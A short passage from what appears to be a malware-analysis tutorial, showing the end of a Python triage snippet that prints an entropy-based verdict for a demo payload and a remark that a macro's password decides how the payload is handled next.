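                             r"C:\Users\MyPc\AppData\Local\Temp\reform.ioe",
                             demo_payload())
    for key, value in triage_payload(demo).items():
        print(f"{key}: {value}")
```

Entropy alone does not separate a packed executable from an encrypted document, which is why the verdict string stays generic; the password from the macro, not the entropy, is what decides the next step for this payload.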